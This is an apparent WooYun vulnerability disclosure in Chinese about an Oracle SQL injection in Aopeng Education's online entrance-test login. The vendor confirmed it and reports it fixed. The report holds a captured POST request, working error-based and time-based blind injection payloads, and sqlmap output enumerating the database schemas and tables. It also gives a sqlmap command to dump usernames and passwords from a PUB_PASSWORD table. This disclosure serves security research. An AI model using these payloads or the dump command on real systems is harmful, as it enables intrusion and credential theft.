乌云(WooYun.org)历史漏洞查询---http://wy.zone.ci/
乌云 Drops 文章在线浏览--------http://drop.zone.ci/
2016-02-17: 细节已通知厂商并且等待厂商处理中 2016-02-17: 厂商已经确认,细节仅向厂商公开 2016-02-18: 厂商已经修复漏洞并主动公开,细节向公众公开
.....
http://exam.open.com.cn/matriculationonline/login.asp 奥鹏教育远程教育中心--入学测试现考系统登录处抓包:
POST /matriculationonline/authenticate.asp HTTP/1.1Accept: */*Accept-Language: zh-cnReferer: http://exam.open.com.cn/matriculationonline/login.aspContent-Type: text/xml; charset=gb2312Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/5.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; .NET4.0C; .NET4.0E)Host: exam.open.com.cnContent-Length: 131Pragma: no-cacheCookie: ASPSESSIONIDASQCRADQ=EIPCOLIBGJNLCMPMHKDDNPEN<?xml version="1.0" encoding="gb2312"?><LoginInfo><UserSerial>111111</UserSerial><UserPassword>11111</UserPassword></LoginInfo>
存在POST注入....
Place: POSTParameter: Imp_userstat Type: error-based Title: Oracle AND error-based - WHERE or HAVING clause (XMLType) Payload: Imp_username=11111&Imp_password=11111&Imp_userstat=2 AND 1574=(SELECT UPPER(XMLType(CHR(60)||CHR(58)||CHR(105)||CHR(120)||CHR(101)||CHR(58)||(SELECT (CASE WHEN (1574=1574) THEN 1 ELSE 0 END) FROM DUAL)||CHR(58)||CHR(114)||CHR(108)||CHR(118)||CHR(58)||CHR(62))) FROM DUAL)&imageField.x=23&imageField.y=10 Type: AND/OR time-based blind Title: Oracle AND time-based blind Payload: Imp_username=11111&Imp_password=11111&Imp_userstat=2 AND 9663=DBMS_PIPE.RECEIVE_MESSAGE(CHR(77)||CHR(84)||CHR(78)||CHR(68),5)&imageField.x=23&imageField.y=10---[04:15:40] [INFO] the back-end DBMS is Oracleweb server operating system: Windows 2003web application technology: ASP.NET, Microsoft IIS 6.0, PHP 5.2.4back-end DBMS: Oracle[04:15:40] [WARNING] schema names are going to be used on Oracle for enumeration as the counterpart to database names on other DBMSes[04:15:40] [INFO] fetching database (schema) namesavailable databases [17]:[*] CTXSYS[*] DBSNMP[*] DMSYS[*] EXFSYS[*] HAIHONG[*] MDSYS[*] OLAPSYS[*] ORDSYS[*] OUTLN[*] SCOTT[*] SYS[*] SYSMAN[*] SYSTEM[*] TSMSYS[*] WMSYS[*] WSD[*] XDB跑一下WSD.....[04:10:57] [INFO] retrieved: WSD[04:10:58] [INFO] retrieved: PUB_ORDER[04:10:58] [INFO] retrieved: WSD[04:10:59] [INFO] retrieved: ZX_PUB_PROVINCE[04:11:00] [INFO] retrieved: WSD[04:11:00] [INFO] retrieved: ZX_UNT_SAL_APPLY_LOG[04:11:01] [INFO] retrieved: WSD[04:11:02] [INFO] retrieved: ZX_WLS_SAL_APPLY_GEN_LOG[04:11:02] [INFO] retrieved: WSD[04:11:03] [INFO] retrieved: YSJ_1[04:11:04] [INFO] retrieved: WSD[04:11:05] [INFO] retrieved: YSJ_USES[04:11:05] [INFO] retrieved: WSD[04:11:06] [INFO] retrieved: YSJ_GOODS[04:11:07] [INFO] retrieved: WSD[04:11:07] [INFO] retrieved: ZX_CUSTOM_CORPORATION[04:11:08] [INFO] retrieved: WSD[04:11:09] [INFO] retrieved: ZX_CUSTOM_ZZ_MYYJK[04:11:09] [INFO] retrieved: WSD[04:11:10] [INFO] retrieved: BMS_PR_CUSTOM[04:11:11] [INFO] retrieved: WSD[04:11:11] [INFO] retrieved: BMS_SA_DOC[04:11:12] [INFO] retrieved: WSD[04:11:13] [INFO] retrieved: BMS_SA_DTL[04:11:14] [INFO] retrieved: WSD[04:11:14] [INFO] retrieved: BMS_SA_INV_INFO[04:11:15] [INFO] retrieved: WSD[04:11:16] [INFO] retrieved: BMS_STORER_POS[04:11:17] [INFO] retrieved: WSD[04:11:18] [INFO] retrieved: BMS_ST_IO_DOC_TMP[04:11:18] [INFO] retrieved: WSD[04:11:19] [INFO] retrieved: BMS_ST_IO_DTL_TMP[04:11:20] [INFO] retrieved: WSD[04:11:20] [INFO] retrieved: BMS_TR_POS_DEF[04:11:21] [INFO] retrieved: WSD[04:11:22] [INFO] retrieved: BMS_LOT_DEFDatabase: WSD[138 tables]+--------------------------------+| BMS_GOODS_STATUS || BMS_LOT_DEF || BMS_PR_CUSTOM || BMS_SA_DOC || BMS_SA_DTL || BMS_SA_INV_INFO || BMS_STORER_POS || BMS_ST_DEF || BMS_ST_IO_DOC_TMP || BMS_ST_IO_DTL_TMP || BMS_ST_QTY_LST || BMS_TR_POS_DEF || DC2_COLLECTPOINT || DC2_COLLECTPOINT_DTL || DC2_COLUMN_INITVALUE || DC2_DATA || DC2_DATA_DTL || DC2_DBVERSION || DC2_ERROR_MANAGER || DC2_INFORMATION_BUFFER || DC2_LOG_TABLE || DC2_LOG_TABLE_COLUMN || DC2_LOG_VIEW || DC2_NODE || DC2_PROJECT_LOG || DC2_RESTORE_LOG || DC_BUF_000802980001 || DC_BUF_000812040001 || DC_BUF_000825240001 || DC_BUF_0009108F0001 || DC_BUF_000911FF0001 || DC_BUF_000952A60001 || DC_BUF_000C00180001 || DC_BUF_000D20AA0001 || DC_BUF_000F04320001 || DC_BUF_000F37940001 || DC_BUF_00113BCF0001 || DC_BUF_001301C30001 || DC_BUF_001304150001 || DC_BUF_001342600001 || DC_BUF_001513410001 || DC_BUF_0016096F0001 || DC_BUF_001621D90001 || DC_BUF_001706170001 || DC_BUF_00190E1D0001 || DC_BUF_001B02B70001 || DC_BUF_001D03BC0001 || DC_BUF_001D14020001 || DC_BUF_002201E60001 || DC_BUF_00220AC70001 || DC_BUF_00230D070001 || DC_BUF_002405930001 || DC_BUF_002533A20001 || DC_BUF_002707330001 || DC_BUF_00280B880001 || DC_BUF_002942C00001 || DC_BUF_002B026B0001 || DC_BUF_002D182C0001 || DC_BUF_003E06E00001 || LG_HIS || LG_IP || LOGIN_HISTORY || MICROSOFTDTPROPERTIES || NOUSE_GOOD || ORDER_IMPORT_TMP || PBCATCOL || PBCATEDT || PBCATFMT || PBCATTBL || PBCATVLD || PHONE || PHONE_CUSTOM || PLAN_TABLE || PO_HEADER || PO_LINE_LOCATION || PRT_BMS_SA_WEBCON_DOC_BACK || PRT_BMS_SA_WEBCON_DTL_BACK || PUB_ADMIN || PUB_CUSTOMER || PUB_CUSTOM_SOURCE || PUB_CUSTOM_TO_SALER || PUB_CUSTOM_TO_SALER_BAK || PUB_DDL || PUB_EMPLOYEE || PUB_EMP_GOODS || PUB_FACTORY || PUB_GOODS || PUB_GOODS_PRICE || PUB_GOODS_VARTYPE || PUB_MOBILEPHONE || PUB_ORDER || PUB_PASSWORD || PUB_SALE || PUB_SMS_USER || PUB_SUPPLYER || TONGTIM_DATA || TONGTIM_MSG || TONGTIM_MSGSERVICE || TONGTIM_MSGTYPE || TONGTIM_MSG_BAK || TONGTIM_TRIGGER || UNT_SAL_APPLY || WLS_SAL_APPLY || XT_XLZZ_WSD || YSJ_1 || YSJ_GOODS || YSJ_TEMP || YSJ_TEMP1 || YSJ_USES || ZMH_SALE || ZMH_TEMP || ZX_BMS_COMPANY_GOODSCLASS || ZX_BMS_GOODS_PRICE || ZX_BMS_SA_CONNO_TICK || ZX_CUSTOM_CORPORATION || ZX_CUSTOM_HEALTHFOODPERMIT || ZX_CUSTOM_LEGAL_INDENTURE || ZX_CUSTOM_MEDDEVICEPERMIT_CLAS || ZX_CUSTOM_MEDDEVICESPERMIT || ZX_CUSTOM_MEDMASSPERMIT || ZX_CUSTOM_MEDORAPERMIT || ZX_CUSTOM_MEDPASSPERMIT || ZX_CUSTOM_MYBJJSFWZYXKZ || ZX_CUSTOM_SPLTXKZ || ZX_CUSTOM_ZZ_MYYJK || ZX_CUS_LEGALINDENTURE_CLS || ZX_GOODS_TR_POS_DEF || ZX_PUB_CITY || ZX_PUB_COUNTY || ZX_PUB_PROVINCE || ZX_SP_GOODS_CLASS || ZX_TIE_ZHENGZHAO_CHECKRULE || ZX_UNT_SAL_APPLY_LOG || ZX_WLS_SAL_APPLY_GEN_LOG || ZX_ZZ_CUSTOM_ANNALS || ZX_ZZ_FACTORY_ANNALS || ZX_ZZ_SUPPLY_ANNALS || ZZ_CONTROL_RULE |+--------------------------------+
直接脱库看看(sqlmap.py -r 1.txt -D WSD -T PUB_PASSWORD -C USERNAME,PASSWORD --dump --threads=10 --start=1 --stop=1000)
危害等级:高
漏洞Rank:18
确认时间:2016-02-17 10:28
已提交相关人员处理。-liu
2016-02-18:漏洞已修复。请帮助检查,感谢!